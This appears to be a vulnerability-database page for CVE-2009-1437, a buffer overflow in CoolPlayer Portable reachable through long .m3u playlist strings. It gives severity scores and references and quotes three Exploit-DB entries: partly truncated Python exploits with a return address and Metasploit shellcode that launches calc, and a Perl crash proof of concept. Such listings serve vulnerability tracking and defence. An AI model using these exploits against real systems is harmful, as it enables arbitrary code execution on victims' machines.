CVE-2009-1437
published 2009-04-27CVE-2009-1437: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.99%
96.1th percentile
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)
exploitdb·2009-04-22
CVE-2009-1437 CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)
---
#!/usr/bin/python
#[*] Usage : coolplayer.py
#[*] Bug : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on : Xp sp2 (fr)
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Note: I didn't know why the stack's exploit won't work for me but i founded that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\xe4\x94\xba\x83\xeb\xfc\xe2\xf4\x85\x0c\xd0\xba\x79\
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)
exploitdb·2009-04-22
CVE-2009-1437 CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)
---
# CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# I test it 12 times but the 13 is worked but i dont know maybe it work in first time for you
# By Stack
chars = "\x41" * 212
eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-20
CVE-2009-1437 CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
---
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ##
# # CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
# milw0rm.com [2009-04-20]
No writeups or analysis indexed.
http://osvdb.org/53885http://secunia.com/advisories/34816https://exchange.xforce.ibmcloud.com/vulnerabilities/49984https://hansesecure.de/vulnerability-in-coolplayer/https://www.exploit-db.com/exploits/8489https://www.exploit-db.com/exploits/8519https://www.exploit-db.com/exploits/8520http://osvdb.org/53885http://secunia.com/advisories/34816https://exchange.xforce.ibmcloud.com/vulnerabilities/49984https://hansesecure.de/vulnerability-in-coolplayer/https://www.exploit-db.com/exploits/8489https://www.exploit-db.com/exploits/8519https://www.exploit-db.com/exploits/8520
2009-04-27
Published